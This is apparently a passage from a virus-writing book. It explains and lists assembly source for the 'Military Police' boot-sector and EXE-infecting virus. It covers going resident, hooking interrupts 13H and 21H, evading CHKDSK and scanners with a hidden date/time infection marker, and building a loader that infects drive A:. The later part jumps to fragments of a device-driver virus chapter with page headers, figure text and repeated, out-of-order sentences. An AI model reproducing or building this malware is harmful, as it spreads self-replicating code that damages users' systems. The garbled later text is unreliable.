The MP as a Boot Sector Virus MP is a multi-sector boot sector virus similar to the BBS. When loaded from a boot sector, it goes resident by reducing the amount of memory allocated to DOS by manipulating the memory size at 0:413H. When the boot sector is executed, MP tries to infect the hard disk, replacing the original master boot sector with its own, and placing the body of its code in Track 0, Head 0, Sectors 2 through VIR_SIZE+1. The original master boot sector is then put in Sector VIR_SIZE+2. When Military Police goes resident, it hooks Interrupt 13H and infects floppy disks as they are accessed. On floppies, it places its code in a free area on the diskette, and marks the clusters it occupies as bad. So far, MP is similar to BBS. Where it departs from BBS is that it will—if it can—turn itself into an ordinary TSR program, and it will also infect EXE files while it’s in memory. The MP Turns TSR A boot sector virus which goes resident by adjusting the memory size at 0:413H may work perfectly well, but going resident in that manner is easily detected, and an alert user should be able to pick up on it. For example, running the CHKDSK program when such a virus is resident will reveal that not all of the expected memory is there. On a normal system, with 640K memory, CHKDSK will report memory something like this: 655,360 total bytes memory 485,648 bytes free If the “total bytes memory” suddenly decreases, a virus is a likely cause. There is no reason, however, that a boot sector virus has to stay in this memory area indefinitely. If it can survive a DOS boot-up, then it can integrate itself into DOS and disappear into the wood- work, so to speak. The MP virus does exactly this. It grabs a time stamp from the system clock at 0:46CH and then waits DELAYCNT seconds (set to 30 here). As soon as Interrupt 13H is called after this delay, the virus installs an Interrupt 21H hook. One purpose of this Interrupt 21H hook is to monitor for the termination of an ordinary applica- tion program using Interrupt 21H, Function 4CH. The virus capi- talizes on this call to install itself into memory. Essentially, it takes over the PSP of the program which is terminating, puts itself in that program’s place, and turns the terminate function (4CH) into a terminate and stay resident function (31H). In this way, the virus becomes resident under DOS. It can then return the high memory it had taken at boot-up to DOS. Let’s go through the steps required to do this in detail . . . . When MP intercepts an Interrupt 21H, Function 4CH, with exit code 0, it gets the PSP of the current process using DOS Function 62H. This segment is then adjusted so that the virus can execute at offset 100H of the PSP using the offset it’s assembled with to work in high memory, mov ah,62H ;get PSP of process int 21H ;requesting to terminate add bx,10H ;adjust for PSP sub bx,7C0H-32*(VIR_SIZE+1) ;adjust virus starting offs mov es,bx ;and put it here Next, the virus is moved into this segment, push cs pop ds ;ds=cs mov si,OFFSET BBS ;move virus to the PSP mov di,si mov cx,512*(VIR_SIZE+2) rep movsb Finally, the Interrupt 13H and Interrupt 21H hooks must be moved to the new segment. This is potentially a difficult task because the interrupt vectors can get layered beneath other interrupt hooks. If they get buried too deeply they can be hard to find. To move Interrupt 21H, MP first examines the segment:offset stored in the Interrupt Vector Table. If it corresponds to cs:OFFSET INT_21H, then MP simply changes the segment to the new value. If they don’t match up, MP assumes something hooked Interrupt 21H after it did. Presumably there won’t be too many layers here, since the time between when MP hooks Interrupt 21H and it gets its first Function 4CH should not be too great. Thus, MP takes the segment value in the Interrupt 21H vector and searches that entire segment for the original pointer, cs:OFFSET INT_21H. If it finds them in this segment, it changes the segment to the new value. The code to perform this operation is given by xor ax,ax mov ds,ax ;ds=0 mov bx,21H*4 ;examine INT 21H vector cmp [bx],OFFSET INT_21H ;is it up here? jne FIND21H ;nope, it’s been changed mov ax,cs ;so we’d better look for it cmp [bx+2],ax je SET21H ;else go change it in int tbl FIND21H:push es mov es,[bx+2] ;didn’t find vector—look for pop ds ;ds=new segment now mov di,0 ;it under another hook mov cx,7FFEH cld F21L: mov ax,OFFSET INT_21H ;search for cs:OFFSET INT_21H repnz scasw ;in this segment jnz ABORT_GO_LOW ;not found, don’t go resident mov ax,cs ;ok, found OFFSET INT_21H add di,2 ;so check for proper cs dec cx cmp es:[di],ax ;is it there?? jne F21L ;no, continue looking mov ax,ds ;yes, found it mov es:[di],ax ;replace it with new cs SET21H: mov [bx+2],es ;change int 21H vector Moving the Interrupt 13H hook might appear somewhat more tricky. It is deeply buried under DOS device drivers and everything else. Fortunately, that difficulty is only apparent. There’s a little known function that will let you re-thread the interrupt ever so nicely. This is Interrupt 2FH, Function 13H. One need only call it with es:bx and ds:dx set up with the new vector and the job is done. With the interrupt hooks moved, the virus has been success- fully moved. The only thing left is to release the high memory it had originally reserved. To do that, MP restores the original value of the memory size at 0:413H. Next, it walks the MCB chain to find the Z block, and enlarges it so that it occupies the space where the virus was originally. Finally it sets up the DOS Interrupt 21H, Function 31H TSR call and executes it. With that, MP disappears from high memory and comes to life as an ordinary DOS TSR. At this point, MP looks no different than if it had been loaded from an EXE file, as we shall see in a moment. Infecting Files The Military Police infects EXE files in much the same manner as the Yellow Worm. It hooks the DOS file search functions 11H and 12H. Now, you may have noticed that the Yellow Worm makes a DIR command somewhat jerky because of the added overhead of opening and checking every EXE file which the search hits. MP remedies this potential problem by implementing a relatively quick method for checking to see if a file is infected, and then only infecting one file per search sequence—after the search sequence has completed. In this way, all jerkiness is eliminated. Rather than opening a file, reading it, and scanning the contents to see if the virus is already present, a virus can put a little flag in part of the directory entry to cue it to its own presence. That would be loaded into memory by the normal search routine and the virus could determine whether or not a file is infected merely by exam- ining memory—much faster than opening and reading a file. What kind of flag is appropriate though? Some viruses use a very simple flag, like advancing the date in the file’s date/time stamp by 100 years. Such flags are so common and so easy to scan for that anti-virus programs commonly look for them. Something a little more convoluted will do the job just as well, without making it too easy to see that anything is amiss. The Military Police virus detects itself by taking the file’s date stamp and the time stamp, adding them together and masking off the lower five bits. That adds the day of the month to the seconds. If these two numbers add up to 31, then the file is assumed to be infected. If they add up to anything else, the file is not infected. In this way, the virus never has a fixed date or time, and the numbers it displays are completely normal. The seconds don’t even show up when one does a directory listing. Once a suitable file has been located, the infection process itself is almost identical to the Yellow Worm’s. The virus appends its code to the end of the EXE file, and modifies the EXE header to fire up the virus when it executes. It also modifies the second count in the date/time stamp so that the seconds plus days will equal 31. Loading from a File When the Military Police is loaded into memory from a file, it begins execution at the label START_EXE. You can think of a multi-partite virus as a virus with two different entry points. The entry point it uses depends on what it’s attached to. If it is in the boot sector, the entry point is the boot sector at offset 7C00H. If it’s attached to an EXE file, the entry point is START_EXE. The first thing it must do is adjust the code and data segments it is using. That’s because it is assembled to start at an offset up near where the boot sector starts. If the virus doesn’t execute with the proper offset, any absolute address references, like data, will be wrong. The label BBS points to this starting offset, so all one has to do is mov bx,OFFSET BBS ;calcuate amount to move segment mov cl,4 shr bx,cl ;amount to subtract is in bx mov ax,cs sub ax,bx to calculate the new segment (in ax). Then one jumps to it by pushing the appropriate addresses and executing a retf. Once adjusted, the MP checks to see if it is already in memory. Unlike the boot-sector startup, the EXE-launched instance of MP must watch out for this, because the virus may have been loaded from the boot sector already, or it may have been loaded by another EXE which ran previously to it. To test to see if it is already there, MP performs a bogus int 13H call, using ax=7933H. Normally this call does not exist, and will return with carry set. However, if the MP is in memory, the call does exist and it will return with no carry. If MP is already in memory, then the new instance of it does not need to load. All it does is relocate the starting addresses of the host program, and then jump to it. The new instance of the virus disappears and the host runs normally. If MP discovers that it is not in memory, it must go resident and run the host program. To go resident, the first thing MP does is copy itself to offset 100H in the PSP. This is accomplished by putting the instructions rep movsb/retf at 0:3FCH in memory. This is the location of the Interrupt 0FFH vector, which isn’t used by anything generally. Still, MP is polite and uses it only temporarily, restoring it when finished. Next, MP sets up the stack and the es:di, ds:si and cx registers so that it can call 0:3FCH, get itself moved, and then return to the code immediately following this call. The registers are set up so that MP is still executing at the proper offset. This is a bit messy, but it’s straightforward if you’re careful about what goes where. After moving itself, MP has to hook interrupts 21H and 13H, which it does in the usual manner. Next, it checks the hard disk to see if it’s infected. If not, it infects it. The final task of Military Police is to execute the host, and then go resident. Since MP uses Interrupt 21H, Function 31H to go resident, it first EXECs the host, re-loading it and running it, using DOS Function 4BH, which we discussed first when dealing with companion viruses. To EXEC the host, MP must release memory using DOS Function 4AH, setting up a temporary stack for itself above its own code. Next, it finds its own name in the environment. Finally, it performs the EXEC, releases unneeded memory from that, and exits to DOS via the TSR function (31H). From that point on, MP is in memory, waiting there active and ready to infect any diskette placed in a floppy drive, or any file it can find through the search functions. The Military Police Source The Military Police virus uses some of the same modules as the BBS virus. There are two new modules, INT21H.ASM and EXEFILE.ASM, and two of the modules are quite different, INT13H.ASM and BOOT.ASM. You’ll also need the FAT- MAN.ASM, which is the same for BBS and Military Police. To convert the main module BBS.ASM to the Military Police, copy it to MPOLICE.ASM. Then, after the statement INCLUDE INT13H.ASM in that module, add two more, so it reads: INCLUDE INT13H.ASM INCLUDE INT21H.ASM INCLUDE EXEFILE.ASM Assembling MPOLICE.ASM with all the modules in the cur- rent directory will produce MPOLICE.COM, a boot-sector loader which will infect the A: drive with Military Police. To attach it to a file, you must of course boot from the infected disk, wait 30 seconds, and then do a DIR of a directory with some EXE files in it. The following modules are the source for Military Police. The INT13H.ASM Listing ;******************************************************************************* ;* INTERRUPT 13H HANDLER * ;******************************************************************************* OLD_13H DD ? ;Old interrupt 13H vector goes here INT_13H: call INT_21H_HOOKER ;Hook interrupt 21H if it’s time sti cmp ah,2 ;we want to intercept reads jz READ_FUNCTION cmp ax,75A9H ;check for virus installed in RAM jnz I13R ;not check, pass to original handler clc ;else return with carry cleared retf 2 I13R: jmp DWORD PTR cs:[OLD_13H] ;******************************************************************************* ;This section of code handles all attempts to access the Disk BIOS Function 2. ;If an attempt is made to read the boot sector on the floppy, and ;the motor is off, this routine checks to see if the floppy has ;already been infected, and if not, it goes ahead and infects it. ; READ_FUNCTION: ;Disk Read Function Handler cmp dh,0 ;is it head 0? jnz I13R ;nope, let BIOS handle it cmp cx,1 ;is it track 0, sector 1? jnz I13R ;no, let BIOS handle it cmp dl,80H ;no, is it hard drive c:? jz I13R ;yes, let BIOS handle it mov cs:[CURR_DISK],dl ;save currently accessed drive # call CHECK_DISK ;is floppy already infected? jz I13R ;yes, pass control to BIOS call INIT_FAT_MANAGER ;initialize FAT mgmt routines call INFECT_FLOPPY ;no, go infect the diskette jmp I13R ;The following routine hooks interrupt 21H when DOS installs. The Interrupt 21H ;hook itself is in the INT21H.ASM module. This routine actually hooks the ;interrupt when it sees that the segment for the Int 21H vector is greater than ;70H, and when it hasn’t already hooked it. DELAYCNT EQU 30 ;time before hooking, in seconds INT_21H_HOOKER: cmp cs:[HOOK21],1 ;already hooked? je I21HR ;yes, don’t hook twice push es push ds push si push di push dx push ax push cs pop es xor ax,ax mov ds,ax mov si,46CH mov ax,WORD PTR [si] mov dx,WORD PTR [si+2] sub dx,WORD PTR cs:[LOAD_TIME+2] sbb ax,WORD PTR cs:[LOAD_TIME] cmp ax,18*DELAYCNT ;90 seconds after load? jl I21HX ;not yet, just exit mov si,84H ;else go hook it mov ax,[si+2] ;get int 21H vector segment mov di,OFFSET OLD_21H movsw ;set up OLD_21H movsw mov [si-4],OFFSET INT_21H ;set new INT 21H vector mov [si-2],cs mov cs:[HOOK21],1 I21HX: pop ax pop dx pop di pop si pop ds pop es I21HR: ret HOOK21 DB 0 ;flag to see if 21H already hooked 1=yes The BOOT.ASM Listing ;******************************************************************************* ;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR * ;******************************************************************************* ORG 7C00H ;Starting location for boot sec BOOT_START: jmp SHORT BOOT ;jump over data area db 090H ;an extra byte for near jump BOOT_DATA: BS_ID DB ’ ’ ;identifier for boot sector BS_BYTES_PER_SEC DW ? ;bytes per sector BS_SECS_PER_CLUST DB ? ;sectors per cluster BS_RESERVED_SECS DW ? ;reserved secs at beginning of disk BS_FATS DB ? ;copies of fat on disk BS_DIR_ENTRIES DW ? ;number of entries in root directory BS_SECTORS_ON_DISK DW ? ;total number of sectors on disk BS_FORMAT_ID DB ? ;disk format ID BS_SECS_PER_FAT DW ? ;number of sectors per FAT BS_SECS_PER_TRACK DW ? ;number of secs per track (one head) BS_HEADS DW ? ;number of heads on disk BS_DBT DB 34 dup (?) ;The following are for the virus’ use VIRCX dw 0 ;cx and dx for trk/sec/hd/drv VIRDX dw 0 ;of virus location ;The boot sector code starts here BOOT: cli ;interrupts off xor ax,ax mov ss,ax mov ds,ax mov es,ax ;set up segment registers mov sp,OFFSET BOOT_START ;and stack pointer sti mov cl,6 ;prep to convert kb’s to seg mov ax,[MEMSIZE] ;get size of memory available shl ax,cl ;convert KBytes into a segment sub ax,7E0H ;subtract enough so this code mov es,ax ;will have the right offset to sub [MEMSIZE],(VIR_SIZE+3)/2 ;go memory resident in high ram GO_RELOC: mov si,OFFSET BOOT_START ;set up ds:si and es:di in order mov di,si ;to relocate this code mov cx,256 ;to high memory rep movsw ;and go move this sector push es mov ax,OFFSET RELOC push ax ;push new far @RELOC onto stack retf ;and go there with retf RELOC: ;now we’re in high memory push es ;so let’s install the virus pop ds mov bx,OFFSET BBS ;set up buffer to read virus mov cx,[VIRCX] mov dx,[VIRDX] mov si,VIR_SIZE+1 ;read VIR_SIZE+1 sectors LOAD1: push si mov ax,0201H ;read VIR_SIZE+1 sectors int 13H ;call BIOS to read it pop si jc LOAD1 ;try again if it fails add bx,512 ;increment read buffer inc cl ;get ready to do next sector cmp cl,BYTE PTR [BS_SECS_PER_TRACK] ;last sector on track? jbe LOAD2 ;no, continue mov cl,1 ;yes, set sector=1 inc dh ;try next side cmp dh,BYTE PTR [BS_HEADS] ;last side? jb LOAD2 ;no, continue xor dh,dh ;yes, set side=0 inc ch ;and increment track count LOAD2: dec si jnz LOAD1 MOVE_OLD_BS: xor ax,ax ;now move old boot sector into mov es,ax ;low memory mov si,OFFSET SCRATCHBUF ;at 0000:7C00 mov di,OFFSET BOOT_START mov cx,256 rep movsw SET_SEGMENTS: ;change segments around a bit cli mov ax,cs mov ss,ax mov sp,OFFSET BBS ;set up the stack for the virus sti push cs ;and also the es register pop es INSTALL_INT13H: ;now hook the Disk BIOS int xor ax,ax mov ds,ax mov si,13H*4 ;save the old int 13H vector mov di,OFFSET OLD_13H movsw movsw mov ds:[si-4],OFFSET INT_13H ;use from now on mov ds:[si-2],es mov si,46CH ;save the LOAD_TIME mov di,OFFSET LOAD_TIME movsw movsw CHECK_DRIVE: push cs ;set ds to point here now pop ds mov [HOOK21],0 ;zero these variables mov [FILE_FND],0 mov [LOWMEM],0 mov dx,[VIRDX] cmp dl,80H ;if booting from a hard drive, jz DONE ;nothing else needed at boot FLOPPY_DISK: ;if loading from a floppy drive, call IS_HARD_THERE ;see if a hard disk exists here jz DONE ;no hard disk, all done booting mov ax,201H mov bx,OFFSET SCRATCHBUF mov cx,1 mov dx,80H [...]... driver is of the binary 222 The Giant Black Book of Computer Viruses format, and not the EXE format It does that by simply checking the first two bytes for “MZ” the usual EXE header ID bytes If these are found, the virus simply ignores the file The infection process itself is relatively simple, involving only two writes First, DEVIRUS finds the end of the host file and uses that as the offset for the new... either the STRAT routine, the INTR routine, or both To understand the infection process a little better, it would help to understand the purpose of the STRAT and INTR routines The INTR routine performs the great bulk of the work in the device driver, and it takes up the main body of the driver It must 218 The Giant Black Book of Computer Viruses be programmed to handle a number of different functions... much memory the device driver needs This is reported in the Request Header as a segment:offset of the top of the device at offset 14 in the header If such a virus does not want to remain resident, it must hook this Function 0, and make sure it is above the segment:offset reported in the Request Header A virus that adds itself to the end of the device driver, and does not modify the segment:offset reported... offset for the new STRAT routine, writing this value into the header Next it hides the address of the old STRAT routine internally in itself at STRJMP, and then writes the body of its code to the end of the SYS file That’s all there is to it The logic of DEVIRUS is depicted in Figure 14. 3, and its action on a typical SYS file is depicted in Figure 14. 4 Note that since a device driver is a pure binary file,... Append virus image to SYS file Figure 14. 3: The logic of DEVIRUS Infecting Device Drivers 221 8 147 5 INTR Routine STRAT Routine INTR Routine ,-8 147 5 OFFSET INTR OFFSET STRAT STRAT Routine OFFSET INTR OFFSET VIRUS Figure 14. 4: The action of DEVIRUS on a SYS file Step Four: Implementation Given a workable infection strategy, the only thing left is to decide how you want the virus to behave Do you want it... every file in the computer? Then program it to do what you want The DEVIRUS virus operates by opening the CONFIG.SYS file and reading it line by line to find commands of the form device=XXXXXX.XXX ABC DEF Once such a command is found, it will truncate off the “device=” as well as any parameters passed to the device, and make the name of the device into an ASCIIZ string Then it will open the device, test... file It’s kind of like coding an EXE program by putting a bunch of DB’s at the start 1 Refer to the Resources section at the end of this book for information on how to get plugged into this network Infecting Device Drivers 215 of it to define the EXE header, and then assembling it as a COM file, rather than letting the assembler and linker create the EXE header automatically.2 Figure 14. 1 illustrates... every file there is a DOS header and a DOS program to go with it Usually that program just tells you “This is a Windows program”, but it could be anything There is a simple trick to determine whether an EXE is for DOS or Windows: At offset 18H in the DOS header is a pointer to the beginning of the relocation table for the DOS program If this offset is 40 HHeader, Windows, offset of or greater, then you... header on it We will not discuss this type of driver here 216 The Giant Black Book of Computer Viruses ;DEVICE.ASM is a simple device driver to illustrate the structure of ;a device driver All it does is announce its presence when loaded ;(C) 1995 American Eagle Publications, Inc., All rights reserved .model tiny code ORG 0 dd dw dw dw db -1 0C 840 H OFFSET STRAT OFFSET INTR ’DEVICE’ ;Link to next device... int dx,OFFSET BBS cx,OFFSET ENDCODE cx,dx ah ,40 H 21H ;ds:dx = start of virus mov mov add adc mov int mov mov mov int dx,WORD PTR [FSIZE] ;find relocatables in code cx,WORD PTR [FSIZE+2] ;original end of file dx,OFFSET HOSTS - OFFSET BBS ; + offset of HOSTS cx,0 ;cx:dx is that number ax ,42 00H ;set file pointer to 1st relocatable 21H dx,OFFSET EXE_HDR+ 14 ;get correct host ss:sp, cs:ip cx,10 ah ,40 H ;and . masking off the lower five bits. That adds the day of the month to the seconds. If these two numbers add up to 31, then the file is assumed to be infected. If they add up to anything else, the file. memory, then the new instance of it does not need to load. All it does is relocate the starting addresses of the host program, and then jump to it. The new instance of the virus disappears and the. exit code 0, it gets the PSP of the current process using DOS Function 62H. This segment is then adjusted so that the virus can execute at offset 100H of the PSP using the offset it’s assembled